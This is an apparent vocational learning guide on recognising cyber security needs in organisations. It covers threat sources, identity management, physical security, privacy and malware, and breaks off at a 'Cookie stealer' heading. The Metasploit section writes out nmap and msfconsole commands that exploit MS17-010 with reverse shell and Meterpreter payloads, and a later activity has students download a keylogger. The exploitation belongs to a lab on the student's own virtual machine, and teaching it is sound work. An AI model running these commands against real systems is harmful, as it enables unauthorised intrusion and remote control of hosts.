Learning Guide VU21990 Recognise The Need For Cyber Security in An Organisation v9.1

Security basics
VU21990 Recognise the need for cyber security in an organisation

Learning guide 1 of 2
This unit provides introductory knowledge and skills to recognize threats, risks, and vulnerabilities to
cyber security in an organisation. It includes the threat sources in an organisation such as networks,
machines, applications, data, users, and infrastructure. The unit also covers an introduction to
common cyber security attack mechanisms, an introduction to identity and access management, and
security issues surrounding Internet of Things (IOT) devices. Finally, the unit introduces the
implementation of tools and systems an organisation can use to protect itself from cyber-attacks.
Contents
VU21990 Recognise the need for cyber security in an organisation.....................................................1
INFORMATION SECURITY.....................................................................................................................................5
THREAT SOURCES..............................................................................................................................................5
.......................................................................................................................................................5
Network.........................................................................................................................................5
Data...............................................................................................................................................5
Applications...................................................................................................................................6
Users..............................................................................................................................................7
Machines.......................................................................................................................................7
Other threat sources.....................................................................................................................7
DATA, NETWORKS, MACHINES, USERS AND APPLICATIONS........................................................................................7
IDENTITY AND ACCESS MANAGEMENT..................................................................................................................7
Active Directory (AD).....................................................................................................................9
SECURING THE PHYSICAL INFRASTRUCTURE............................................................................................................9
REASONS TO PROTECT ONLINE IDENTITY AND PERSONAL DATA................................................................................11
Reputation...................................................................................................................................12
Financial.......................................................................................................................................12
Other reasons to protect your online identity and data..............................................................13
How are identities stolen.............................................................................................................13
PROTECTING PERSONAL PRIVACY.....................................................................................................................13
REASONS TO PROTECT AN ORGANISATION’S DATA.................................................................................................14
Legal............................................................................................................................................14
Reputational................................................................................................................................14
Financial.......................................................................................................................................15
Operational..................................................................................................................................15
WHAT IS A CYBER THREAT?...............................................................................................................................15
WHY DO WE NEED CYBER SECURITY PROFESSIONALS?..........................................................................................16
SECURITY VULNERABILITIES AND MALWARE........................................................................................................17
Malware.......................................................................................................................................17
Vulnerability................................................................................................................................17
Common Weakness Enumeration (CWE).....................................................................................18
SOURCES OF MALWARE.................................................................................................................................18
THREAT ACTORS, THREAT VECTORS AND THREAT GOALS.......................................................................................22
TECHNIQUES TO INFILTRATE A SYSTEM..............................................................................................................23
Keylogging...................................................................................................................................23
Cookie stealer..............................................................................................................................24
Bait and switch............................................................................................................................24
Page 2 Security Basics Learning guide 1 of 2 VU21990 Recognise the need for cyber V9.1
512277200.docx
Eavesdropping.............................................................................................................................24
Phishing.......................................................................................................................................24
Clickjacking..................................................................................................................................24
Fuzzing.........................................................................................................................................24
Advanced Persistent Threat (APT)...............................................................................................25
Back door.....................................................................................................................................25
CHARACTERISTICS OF A CYBER-ATTACK................................................................................................................27
ACTORS.........................................................................................................................................................27
Motivation...................................................................................................................................27
Target..........................................................................................................................................28
Attack surface..............................................................................................................................28
Effect on target............................................................................................................................28
Duration.......................................................................................................................................28
Attack vector................................................................................................................................29
Vulnerability................................................................................................................................29
Malicious software......................................................................................................................29
OPERATION OF A CYBER ATTACK......................................................................................................................30
Target attack................................................................................................................................30
CYBER THREAT TRENDS..................................................................................................................................31
Phishing.......................................................................................................................................31
Remote access and IoT................................................................................................................32
Smartphones...............................................................................................................................32
Artificial intelligence....................................................................................................................32
CYBER-ATTACKS ON ENTERPRISE INFRASTRUCTURE................................................................................................32
Examples of enterprise infrastructure attacks.............................................................................32
INTERNET OF THINGS DEVICES.........................................................................................................................33
IoT device examples....................................................................................................................33
IOT SECURITY VULNERABILITIES.......................................................................................................................34
PROTECTING PERSONAL DEVICES AND DATA.......................................................................................................35
Encryption...................................................................................................................................35
Hashing........................................................................................................................................35
Trusted Platform Module (TPS)...................................................................................................36
Passwords....................................................................................................................................36
Python Script for Password Cracking...........................................................................................38
.....................................................................................................................................................40
Multi-factor authentication.........................................................................................................41
512277200.docx
Backup.........................................................................................................................................41
Anti-malware and Anti-virus........................................................................................................41
....................................................................................................................................................................42
OPERATING SYSTEM AND APPLICATION UPDATES................................................................................................42
Configure browser to block Flash, ads and java...........................................................................43
AUTHENTICATION TECHNIQUES.......................................................................................................................45
AAA..............................................................................................................................................46
Active Directory Users and Computers........................................................................................46
LOGICAL AND PHYSICAL METHODS OF GAINING ACCESS TO COMPUTING ELEMENTS....................................................46
Biometric devices........................................................................................................................46
Permissions..................................................................................................................................47
EQUIPMENT USED TO PROTECT AN ORGANISATION FROM CYBER SECURITY ATTACKS...................................................48
Firewall........................................................................................................................................48
Intrusion Detection system..........................................................................................................49
Intrusion Prevention System (IPS)...............................................................................................49
IPS, IDS & Firewall differences.....................................................................................................50
Unified Threat Management System (UTM)................................................................................50
Router..........................................................................................................................................50
Switch..........................................................................................................................................50
Cyber kill chain.............................................................................................................................51
BOTNET.........................................................................................................................................................51
Behaviour based security (or heuristics)......................................................................................51
METHODS FOR PROTECTING AN ORGANISATION FROM CYBER-ATTACK.....................................................................52
Cyber security standards bodies..................................................................................................53
Enterprise Security frameworks..................................................................................................53
BEHAVIOUR BASED APPROACH TO CYBER SECURITY (BEHAVIOURAL ANALYTICS).........................................................54
INCIDENT RESPONSE STANDARDS....................................................................................................................55
Revisions......................................................................................................................................56
512277200.docx
Information Security
“….Information Security is the practice of preventing unauthorized access, use, disclosure,
disruption, modification, inspection, recording or destruction of information….” (Geeks for Geeks)
https://www.geeksforgeeks.org/what-is-information-security/ (accessed 29 May 20202)
Information security helps maintain confidentiality, integrity, and availability (CIA) of data.
Confidentiality of information means that it is only to be disclosed to authorised users; Integrity of
information means that it is not to be changed without permission; Availability of information means
that it is always available.
1.2 Threat sources for an organisation are identified
Threat sources
A threat source, sometimes referred to as a threat agent, is “The intent and method targeted at the
intentional exploitation of a vulnerability, or a situation and method that may accidentally trigger a
vulnerability”1.
This definition shows that a threat source maybe intentional or accidental. For example, an
intentional threat could be the act of breaking into a computer system, and an accidental threat
could be the act of someone forgetting to lock their computer.
A threat source is the cause of a threat, such as a hostile cyber or physical attack, a human error of
omission or commission, a failure of organization-controlled hardware or software, or other failure
beyond the control of the organization. A threat event is an event or situation initiated or enabled by
a threat source that has the potential for causing adverse impact.
A threat source is at the root of adverse effects
Threat Initiates Threat Exploits Causing Adverse

Vulnerability
source event impact
Figure 1 - Chain of events causing adverse impacts
Sources of threats can be categorised in various ways. For example, network, data, applications,
users, machines, and natural events.
Network
Network threat sources include hardware such as routers, switches, workstations, and servers, as
well as software such as server operating systems.
Data
Data threat sources include confidential information that when revealed, exposes an organisation to
financial, reputational, or operational loss.
1
https://csrc.nist.gov/glossary/term/threat_source (accessed 29 May 2020)
512277200.docx
Applications
Applications include usable applications such as MS Word and Adobe PDF reader. Applications such
as these have vulnerabilities that can be exploited. For example, MS Word can automate tasks via
recording the minor actions that make up that task. For example, the act of bolding some text,
changing the font type and then the font size, can all be recorded in a single macro that can be
subsequently activated by clicking a single button.
Figure 2 - Macro recording in MS Word
However, aside from this harmless type of macro, the “Visual Basic for Applications” (VBA) language
that is used to create harmless and useful macros can also be used to run shell commands and
programs. This means it can delete files and use other applications such as an email program.
Application threat source example

An example of a malicious macro is the Melissa virus. The macro when executed would email a copy
of the infected document to the first 50 users in the users email address book. When each user
subsequently opened the document, another 50 users would receive the email.
Office macros are somewhat controlled now as they are no longer loaded by default, but rather a
user is warned that the document contains macros and has the choice to open it, or not.
Other application threat sources

Many if not all applications have vulnerabilities
Activity – visit the CVE database and review Adobe PDF vulnerabilities. An example is CVE-
2019-7841(Out of bounds read vulnerability) https://www.cvedetails.com/vulnerability-
list/vendor_id-53/product_id-497/Adobe-Acrobat-Reader.html
Activity - Watch a video explaining how on how data may go out of bounds (buffer overflow
vulnerability)
https://www.youtube.com/watch?v=1S0aBV-Waeo (17:00)
512277200.docx
Users
User threat examples include those internal and external to an organisation such as hackers,
terrorists, suppliers, competitors, and employees. A specific example could be an internal employee
who inadvertently emails a virus, leaves confidential files available, or uses a mobile phone
application designed to collect private data. An intentional user source could be a hacker who
attempts to circumvent system security for financial benefit or malicious purposes.
Machines
Machine threat source examples include virus infected PCs that carry out malicious activities, PCs
used accidentally to access confidential information, routers used in a botnet DDoS attack and
sensors such as IP cameras that record confidential information that later maybe viewed with
malicious intent.
Other threat sources

The National Institute of Standards and Technology (NIST) break threat sources into adversarial,
accidental, structural, and environmental.
Activity - visit NIST and review examples of types of threat sources (appendix D NIST special
publication 800-30r1
https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-30r1.pdf
https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-30r1.pdf
1.3 Relationship between data, networks, machines, users and applications in an enterprise is
defined
Data, networks, machines, users and applications

Data, networks, machines, users, and applications are all related. For the most part users are the
glue that binds the others together. A user is required to control a machine that in turn controls an
application that in turn uses data for some purpose. However automated machines can also use
applications, data as well as also other machines for various purposes. A network of some type is
required for sharing data.
Essentially, a user enters or modifies data using an application on a machine. The data can
subsequently be transmitted over a network for storage or for use by another application, machine,
and user.
1.4 Introduction to identity and access management (IAM) is clarified
512277200.docx
Identity and Access Management
Identity and access management (IAM), sometimes called simply ‘Identity Management’, is the
combination of business processes, policies and technologies that together facilitates the central
management of digital identities.
In years past when applications, services and users were less in number than today, management of
their identities and access was handled manually. However, today a typical user requires access to
perhaps hundreds of applications and services to carry out their job function. Also, these
applications and services might span multiple organisations and technologies including mobile, on-
premises and cloud. Also, an organisation may have hundreds or thousands of users. An IAM system
enables secure and central management of this.
IAM brings all required resources for an identity together in a single digital identity that can be
accessed with a single login. Within an enterprise this is referred to as Single Sign On (SSO). Across
multiple enterprises this is referred to as Federated Sign On.
The benefits of IAM include the following:
 improving operation efficiency by decreasing the need to make large modifications when a
user changes their role. Assuming roles having been previously setup, when a user changes
their role, they can simply be moved into an existing role
 Enhances compliance for confidentiality and privacy by more effectively managing how data
is accessed
 Reducing financial cost by minimising resource use such as bandwidth and storage via
ensuring that only required identities have access required resources.
 Increased confidentiality and integrity via restricting access to sensitive information
It is common for the Active directory service provided in Windows server to be defined as an IAM
system. However, Active directory is more correctly termed as an IAM technology. It is a central
repository of user information used to authenticate logins and authorise access to resources. In
comparison to an IAM technology, an IAM system automates the process of populating and
Activity – Review information about IAM systems and technology to better

understand the difference
https://stackoverflow.com/questions/43987531/difference-between-active-directory-
and-identity-and-access-management
https://www.esecurityplanet.com/products/top-iam-products.html
managing Active directory, or another directory service. A complete IAM system includes the human
policies and procedures used to implement the IAM technology.
512277200.docx
Some IAM technologies available today include those from Azure Active Directory, Oracle, IBM and
RSA.
Activity – define IAM in two sentences.
Some further examples to help defining IAM are given below:
https://searchsecurity.techtarget.com/definition/identity-access-management-IAM-
system
https://hitachi-id.com/resource/iam-concepts/
Active Directory (AD)

AD is a service found within Windows server operating systems such as server 2016. AD is a
directory, or data store, that contains information about network objects such as user accounts,
computer accounts, servers, and printers. Active Directory is installed when the Active Directory
Domain Services role is added to Windows server.
Activity – View the following video: https://www.youtube.com/watch?v=OTpbQkW3kj4
1. Define the following terms – you may do additional online research to clarify your
answers:
a. Active Directory
b. Domain
c. Domain Controller
2. What is the difference between active directory and domain controllers?
Installing Active Directory

Since Windows 10, Active Directory can be installed in both Desktop and Server versions of Windows
operating system. For this Unit we will be installing Active Directory in the Server version to create a
new domain.
Activity – view the video: https://www.youtube.com/watch?v=dXdQwDA4II0 (16:00)

Download a copy of Windows 2016 Server and install it to Virtual Box
Install active directory to your new VM and make it a domain controller for
mydomain.local
Hint: You may wish to refer to the tutorial at http://pc-addicts.com/setup-active-
directory-server-2016/ while stepping through the installation and configuration of your
Active Directory on your Windows Server VM
512277200.docx
1.5 Security of physical infrastructure of the enterprise is identified and evaluated
Securing the physical infrastructure

It is important to secure the physical IT infrastructure. All the firewalls, login credential strength and
logical access permissions in the world are not going to be of any use if a person can simply walk in
and take, destroy, reconfigure or otherwise interfere with, physical infrastructure such as PCs,
servers, switches, routers and backup media.
Securing the physical infrastructure involves the following
 Securing the premise

 Securing the equipment
 Secure behaviour
Securing the premise Securing equipment Secure behaviour
Isolate secure areas from non- Disable access ports such as Training for users e.g. Locking
secure areas to minimise USB devices when not in use and
human traffic
include protection from fire, Encrypt where possible Use policies such as no external
flood and other natural including BYOD drives and no rogue WiFi
disasters devices
Keep confidential areas Secure disposal of equipment Access protocols or policies

unmarked where appropriate such as physically destroying stating when entry is allowed
disk drives
Physical security controls such Biometric access on computing Dedicated physical security
as door/gate key Locks, swipe devices department or individual
access and biometric devices
Alarm functions such as motion UPS and /or generators to deal Defense in depth policy*
detection, cameras and sirens with electricity outages
including network monitoring
to determine if devices are in
use
Barriers including fencing and Adequate HVAC control to Implement access logs on
mantraps to prevent tailgating prevent high humidity and devices and also at site
excess heat
Vetted security guards and Ongoing auditing of access log
512277200.docx
vetted employees and security policies
Site design and layout Threat profiles*
Identity badges
*Defense in depth’ is a method of securing assets through multiple layers of security. For example, a
computer with a biometric access system, in a locked room, in a locked building, behind a secured
fence, with a security guard. Deterrence, denial, detection then delay is a four layer in depth defense
model. For example, a fence is a deterrent, a locked room implements denial, an alarm system offers
detection and a cable lock on a computer will delay theft.
* A threat profile documents types and levels of risk. It states targets, threats, vulnerabilities, and
scenarios. A threat profile document can be assessed to determine priorities such as most vulnerable
equipment or equipment relevant to ongoing business success.
Activity
Visit abc.net.au and review Specsavers theft

https://www.abc.net.au/news/2019-06-19/specsavers-data-breach-potential-
compromise-for-clients/11223800
Visit acfe and review Coca-cola data breach case
https://www.acfe.com/fraud-examiner.sapx?id=4294986501
Visit infosecurity-magazine and review USB breach
https://www.infosecurity-magazine.com/infosec/usb-breach-physical-security-1-1-1/
Activity – visit cso and review bank heist via physical computer access
https://www.csoonline.com/article/2133530/gang-exploits-both-physical-and-system-
security-during-bank-robbery.html
Search the internet to find a video relative to cyber physical security. Provide a brief
overview of the video, or an interesting section of the video, after watching it (15
minutes maximum)
2.1 Reasons to protect online identity and personal data are clarified
512277200.docx
Reasons to protect online identity and personal dataYour online identity is the sum of your
characteristics and interactions online. You can look at it as your digital footprint. This includes
personal data such as your name, birthdate, home address, email address, phone numbers,
Medicare number, names of relatives, financial details and anything else that is personal and you put
online, including your political and religious views if you choose to post them or submit them to a
data collection service. Your online identity is also formed by your Internet search results, YouTube
searches, eBay purchases and travel/location patterns as defined by your phone. Your online
identity is also formed by your interactions on social network such as Facebook and your interactions
and posts on public forums.
Having your personal data in someone else’s hands may have good and bad consequences. Banks for
example may track your activity to better determine if your accounts are being accessed by someone
other than you. Shopping sites track your activity to better target your needs. However, it is
important to take care to protect your online identity and personal data because having it stolen can
result in reputational, financial, and other issues.
Reputation
We don’t have much control over how our personal data is shared and companies do collect and sell
personal data to others. Once the personal data is in the hands of others it is possible that intimate
details are revealed publicly resulting in embarrassment and loss of reputation. Also consider the
possibility of someone masquerading as you on social media and then you having to somehow clear
your name.
Even if you have nothing to hide at this time, your online data may be taken out of context and
misinterpreted. For example, if you were to do an Internet search relative to some radical
organisation as part of a research assignment, it may be assumed that you actually support that
radical organisation.
Financial
Your personal details can be used in identity fraud. And once your identity has been taken there is
potential to apply for government benefits, remove funds from your bank account and apply for
credit in your name. Even though you may not be held financially accountable for credit obtained in
your name, it could still be added to your credit report.
Other forms of financial fraud include taking out a loan in your name, gaining employment using
your details and the sale of credit card details that go on to be used fraudulently. Credit card details
are traded on the Internet and obtain via phishing, spyware, public WiFi, card skimmers and cyber
security data breaches.
Activity – Learn about browser fingerprinting.
Visit internetsociety.org and watch a video titled ‘Four reasons to care about your digital
footprint”
https://www.internetsociety.org/tutorials/your-digital-footprint-matters/
Visit abc.net.au and review stolen identity cases
https://www.abc.net.au/news/2018-09-28/couple-whose-details-were-used-to-order-phones-
blame-dark-web/10311534 512277200.docx
https://www.abc.net.au/news/2017-07-04/id-theft-like-a-bad-movie/8672400
Other reasons to protect your online identity and data
 Avoiding being robbed due to access of information you may have posted on social networks
notifying of your impending absence.
 Protecting your employability because potential employers often do online background
checks of social media and other areas
 Maintaining credibility for court proceedings where online events may tarnish your status
 General privacy. Take for example the case where a young woman purchased a few online
items relative to her pregnancy. The online shop in question started providing targeted
pregnancy advertisements to her browser which her unknowing father saw.
 Unknown future threats. Who knows how your private data may be used against you in 10
or 20 years’ time
 The emotional fall-out from being a victim of online data theft include self-blame, feeling
vulnerable, isolation and stress
 Prevent identity theft
How are identities stolen

Identity theft occurs when someone acquires a user’s personal information as follows.
 A user maybe deceived into revealing personal information

 If a single users’ password can be compromised, the unlocking of that account may provide
enough information to unlock further accounts until all accounts are compromised
 Passwords and personal information can be acquired via eavesdropping either in-person or
via wireless communications
 A mass data breach may see personal information sold
Activity – Learn about browser fingerprinting.
1. Visit https://pixelprivacy.com/resources/browser-fingerprinting/ Briefly describe

what browser fingerprinting is
2. Visit amiunique and view your browser fingerprint: https://amiunique.org
For students to follow up on if they want to learn about protecting their online identity:
https://www.afp.gov.au/what-we-do/crime-types/fraud/identity-crime
https://www.internetsociety.org/tutorials/manage-your-identity
512277200.docx
4.4 Methods and tools to safeguard personal privacy are defined
Protecting personal privacy

 Logout of devices when not in use
 Only use HTTPS encrypted websites rather than HTTP sites which transmit data in clear text
 Use two-factor authentication
 Ask for verification of identity when being asked for personal information and contest
someone’s right to ask for your personal information
 Turn off browser cookies or use tracking blocker plugins, to prevent tracking
 Take care with what is shared on social media
 Use secure WiFi connections to prevent eavesdropping
 Use anti-virus and Anti-malware
 Get software from a trusted source to prevent using infected software
 Use a search engine without tracking such as DuckDuckGo
 Change passwords regularly
 Install relevant browser plugins such as ‘Privacy Badger’ which blocks tracking
Activity – Learn about password hygiene.
Visit WindowsReport and review browser privacy plugins

https://windowsreport.com/chrome-privacy-extensions/
Visit makeuseof and review the benefits/detriments of regularly changing passwords

https://www.makeuseof.com/tag/frequent-password-changes/
Visit telesign note the various services that offer 2FA

https://www.telesign.com/turnon2fa/tutorials/
Visit phishingquiz and test your ability to detect phising emails

https://phishingquiz.withgoogle.com/
2.2 Reasons to protect an organisation’s data are explained
Reasons to protect an organisation’s data

Reasons to protecting a business’s online data include financial, legal, reputational, and operational.
512277200.docx
Legal
Depending on the activities of an organization there may be mandatory requirements for securing
customers private data. If the data is leaked and it is found that adequate steps were not taken by
an organization to it, then the organization may be found liable.
Reputational
Customer trust and confidence can be impacted when private data is leaked. This is not just an
emotional choice for a client but can impact them financially as for example they spend money
combating subsequent identity theft. Also, if network details such as IP addresses and equipment
specifics are made available, successful cyber-attacks are more likely. This could result for example in
malicious software being installed on an organisation’s website which is subsequently download by
customers as a virus. This would further erode customer trust and confidence.
Financial
Customer trust and confidence can be impacted when private data is leaked and they subsequently
may take their business elsewhere, which would result in financial detriment to the organisation.
If information about an organisation’s internal network is leaked, for example the IP addresses of
internal devices, then an attack is more likely than otherwise to be successful. The outcome of this
could be business downtime which indirectly affects the organisation’s finances. In addition, perhaps
a competitor has mounted a cyber-attack and extracted information to help further their
competitive advantage.
Operational
Details of an organisation’s IT infrastructure need to be kept private. If this information is leaked
there is a greater potential for successful cyber-attacks such as DDoS and system access attempts
which could prevent an organisation from operating partially or complete
2.3 Concept of cyber threat is defined
What is a cyber threat?

A cyber threat is a malicious computer related act designed to steal data, damage reputation, reduce
operational ability, spy on operations, or cause financial gain. There are many cyber threats including
the following:
 Advanced Persistent Threats (remain resident but undetected)

 Phishing
 Trojans, worms, and viruses
 Botnets
 Ransomware
 Distributed Denial of Service (DDoS)
 Spyware/Malware
 Man-in-the-Middle (MITM)
 Drive-By Downloads
 Malvertising
512277200.docx
 Unpatched Software
 Social engineering
Activity – Use an Internet search to briefly define each of the threats mentioned above.
Term Definition
Advanced Persistent Threats
(remain resident but undetected)
Phishing
Trojans, worms, and viruses
Botnets
Ransomware
Distributed Denial of Service

(DDoS)
Spyware/Malware
Man-in-the-Middle (MITM)
Drive-By Downloads
Malvertising
Unpatched Software
Social engineering
Activity – Visit scamwatch and register for scam alerts
https://www.scamwatch.gov.au/news/subscribe-to-scam-alert-emails
2.4 Reasons for the need of cyber security professionals are explained
512277200.docx
Why do we need cyber security professionals?
There was a time when cyber security knowledge or skill was just an add-on requirement for people
working in Information Technology. However, the increase in cyber-attacks over the years has
brought with it the need for professionals specialising in that area. The large range of cyber threat
types and sheer quantity of attacks, combined with the professional approach that some cyber
criminals take today, means that dedicated professionals are required as the main defense.
As the world moves ever more toward technology, embracing Industry 4.0 and its relationship with
the Industrial Internet of Things, the attack surface increases. Along with the increased attack
surface the increase in Industrial Internet of Things brings with it the potential for serious cyber-
attack consequences as attacks on essential services such as electrical, gas and water as well as
manufacturing infrastructure becomes more likely.
To date there have been no fatalities from cyber-crime. But that could just be temporary state. Early
on in computing cyber-crime was virtually unheard of, then in the early 90’s cyber-crime began to
increase, but it was not such a serious state of affairs. Attacks were often humorous or lacked any
serious effect other than annoyance. Today the stakes have been raised. There is serious money to
made via cyber-crime and so there has been a rapid increase in attacks. More recently we have seen
nation states attacks and serious attacks on infrastructure that could have resulted in deaths.
Activity – Visit Cyber Security Intelligence.com and review attacks with potential
deaths
https://www.cybersecurityintelligence.com/blog/deaths-from-cyber-attacks--3448.html
Visit Sydney Morning Herald and review potential deaths from cyber attacks
https://www.smh.com.au/technology/death-by-hacking-is-no-longer-a-far-fetched-idea-
20180209-p4yzte.html
3.1 Security vulnerabilities and malware are identified and demonstrated
Security vulnerabilities and malware

Malware
Malware is an abbreviated term for ‘malicious software’. Malware is software designed to interact
maliciously with a computer system. Malicious intent includes disruption to services, damaging
computer systems and associated equipment, damaging reputations, extract confidential
information, deleting or modifying data, and holding data to ransom.
Vulnerability
A vulnerability is a weakness or flaw that can be exploited with an attack. In computing,
vulnerabilities exist in operating systems, firmware, and application software. Within an operating
system, vulnerabilities exist in the individual services such as DHCP, DNS, Web and FTP services, as
512277200.docx
well as within the underlying structure of the system such as the file permission system and login
processes. Aside from computing, vulnerabilities are also found at the human level and include
procedures, human behaviour, and physical access points.
Common vulnerabilities include the following:
 Missing data encryption

 OS command injection
 SQL injection
 Buffer overflow
 Missing authentication for critical function
 Missing authorization
 Unrestricted upload of dangerous file types
 Reliance on untrusted inputs in a security decision
 Cross-site scripting and cross-site forgery
 Download of source code without integrity checks
 Use of broken encryption algorithms
 URL redirection to untrusted sites
 Path traversal
 Bugs
 Weak passwords
 Software that is infected with virus
Activity – Visit OWASP and define the following vulnerabilities – OS command

injection; SQL injection; Buffer overflow; cross-site scripting; cross-site forgery; path
traversal;
https://www.owasp.org
Common Weakness Enumeration (CWE)

“CWE is a community-developed formal list of common software weaknesses. It serves as a common
language for describing software security weaknesses, a standard measuring stick for software
security tools targeting these vulnerabilities, and as a baseline standard for weakness identification,
mitigation, and prevention efforts.” (CWE, 2019)
Activity
Visit CWE and review: https://mitre.org
Visit CVE and review the top 50 vulnerable products: https://www.cvedetails.com/top-

50-products.php
512277200.docx
Sources of malware
Trojans, viruses, and other malware can be found on the Internet for research purposes. This is done
solely at a users’ discretion bearing in mind the risk of doing so. Downloads should be done in a
virtual machine, and once downloaded, the machine should be air-gapped.
https://zeltser.com/malware-sample-sources/
https://zeltser.com/malicious-ip-blocklists/
Metasploit
Metasploit is a framework developed by Rapid 7, for testing vulnerabilities. It is available for
Windows and Linux. Using Metasploit, one can send exploits to a remote device and follow up with a
payload. An exploit is a module provided by Metasploit that carries out a sequence of commands to
take advantage of a vulnerability. Examples of exploits include code injection, buffer overflow and
web application exploits. A payload is the shell code that is able to run on a target system after
successful exploitation that enables activity such as adding users, remote desktop access and
executing programs
The basic steps for exploiting a system using the Framework are as follows:
 identify a target
 choose an exploit
 select a payload
 launch the exploit
 deliver the payload
A more detailed description of the process is:
1. Choosing and configuring an exploit (code that enters a target system by taking advantage of
one of its bugs; about 2000 different exploits for Windows, Unix/Linux and Mac OS X
systems are included)
2. Checking whether the intended target system is susceptible to the chosen exploit
3. Choosing and configuring a payload
4. Choosing the encoding technique to encode the payload so that the intrusion-prevention
system (IPS) will not catch the encoded payload
5. Executing the exploit
6. Delivering the payload
msfconsole
msfconsole is a menu-based command-line tool that drives the Metasploit framework. To update
Metasploit on Kali run apt-get install metasploit
Using msfconsole you could run random exploits, but a more efficient method is to match up
vulnerabilities found using a vulnerability scanner such as Nessus, to the exploits available in
Metasploit. For example, after looking into the details the report from Nessus scan you would
identify any missing patches and Common Vulnerabilities and Exposures (CVE). You would then use
Metasploit’s search function to search for corresponding exploits. Nmap can also scan for
vulnerabilities. The example below shows the syntax for conduction an Nmap scan for a specific
vulnerability.
nmap --script smb-vuln-ms17-010 -v <target_ip>
512277200.docx
smb-vuln-ms17-010 refers to a ‘remote code execution’ vulnerability known as eternalromance. If
the vulnerability is present, as it is on various unpatched Windows operating systems, then
Metasploit can exploit it.
Activity
Visit Microsoft and review EternalRomance
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
Within Metasploit, exploit modules can be searched for via platform, name, and other identifiers
 msf5> search platform:Windows

 msf5 > search type:exploit
 msf5 > search author:hd
 msf5 > search app:client
 msf5 > search name:ms08-067
Sending the exploit

Having found an exploit you now need to tell MSF to use the exploit, show the payloads for the
exploit, set the payload to be used, view & set any additional options such as the IP address of the
target, and finally run the exploit.
Example:
msf > search eternalromance #search to see if exploit is available in metasploit
msf > use exploit/windows/smb/ms17_010_psexec #prepare to use the exploit

msf > show payloads #show which payloads are available
msf > set payload windows/x64/shell_reverse_tcp #set the payload to use
msf > show options #see which options are available for the payload
msf > set RHOST 172.168.45.130 #set target IP address

msf > set LHOST 172.168.45.135 #set attacker IP address
msf > run
Metasploit payloads
Some of the common payload names used by mfs are as follows:
 windows/adduser
Create a new user in the local administrator group on the target machine exit
 windows/exec
Execute a Windows binary (.exe) on the target machine
 windows/shell_bind_tcp
Open a command shell on the target machine and wait for a connection
512277200.docx
 windows/shell_reverse_tcp
Target machine connects back to the attacker and opens a command shell (on the target)
 windows/meterpreter/bind_tcp
Target machine installs the Meterpreter and waits for a connection
 windows/meterpreter/reverse_tcp
Installs Meterpreter on the target machine then creates a connection back to the attacker
 windows/vncinject/bind_tcp
Installs VNC on the target machine and waits for a connection
 windows/vncinject/reverse_tcp
Installs VNC on the target machine and sends VNC connection back to target
Note the difference here between bind and reverse. Binding sends the exploit and makes the
connection, whilst reverse sends the exploit but waits for the target to make the connection.
The Meterpreter is a program that can be installed on a compromised system, and provides access to
its features such as uploading and executing files as well as killing processes.
https://null-byte.wonderhowto.com/how-to/exploit-eternalblue-windows-server-with-metasploit-
0195413/ (accessed 29 May 2020)
Activity
Visit Offensive Security and review how to use metasploit
https://www.offensive-security.com/metasploit-unleashed/
512277200.docx
Activity
Use metasploit to run an exploit on a system. Use the CVE database or listing at rapid7
to find an exploit for a vulnerability on your virtual system. Note that the ms-17-010
eternalromance vulnerability can be exploited if server 2016 has not been updated since
2017
https://www.rapid7.com/db/
Run nmap scanner from Kali to Server 2016 to determine if the system is vulnerable.
nmap –script smb-vuln-ms17-010 -v <target_ip>
Run Metasploit from Kali to Server 2016 as follows:
msf > search eternalromance #search to see if exploit is available in

metasploit
msf > use exploit/windows/smb/ms17_010_psexec #prepare to use the exploit
msf > show payloads #show which payloads are available
msf > set payload windows/x64/meterpreter/reverse_tcp #set the payload to use
msf > show options #see which options are available for the
payload
msf > set RHOSTS 172.168.45.130 #set target IP address
msf > set LHOST 172.168.45.135 #set attacker IP address
msf > run
* Ensure the correct port is being used by metasploit (445)
3.2 Threat actors, threat vectors and threat goals are defined
Threat actors, threat vectors and threat goals

Threat actors are the entities that carry out cyber-crime. Threat actors can be classified as:
 Hactivist (motivated by political and social causes rather than financial)

 Nation state (backed by governments)
 Internal to an organisation (intentional and unintentional offenders)
 External to an organisation
 Individual
 Groups
 Cyber criminal
512277200.docx
Activity
Visit US Cybersecurity and review various famous hacktivist groups
https://www.uscybersecurity.net/infamous-hacking-groups/
Visit Tech Target and review further details about hacktivist group ‘Anonymous’
https://whatis.techtarget.com/definition/Anonymous
Visit BAE Systems and review ‘the nation state actor
https://www.baesystems.com/en/cybersecurity/feature/the-nation-state-actor
Visit New Statesman and review “Microsoft reveals scale of nation-state attacks
https://tech.newstatesman.com/security/microsoft-customers-nation-state-hackers
3.3 Techniques used by attackers to infiltrate a system are described and demonstrated
Techniques to infiltrate a system

There are many techniques used to infiltrate a system
Keylogging
Keyloggers maybe software or hardware. One example of a hardware keylogger is a USB dongle that
can be inserted into a machine and will record all key events to its internal memory. Another
hardware keylogger example is a sniffer that intercepts traffic from a wireless keyboard. One
advantage of a hardware keylogger is that it logs data from the moment a PC is turned on, and so it
can record login credentials.
Software keyloggers become resident in memory sometime during the boot up process and so they
may miss the initial login event. Software keyloggers record data to a log file. They can be installed
manually on a machine or installed as part of a virus. Once installed a keyloggers log file can be
uploaded to a website, periodically emailed, or wirelessly transmitted.
Activity - Download a free software keylogger and capture keyboard events

http://perfectgeeks.com/free-keylogger-software/
512277200.docx
Cookie stealer
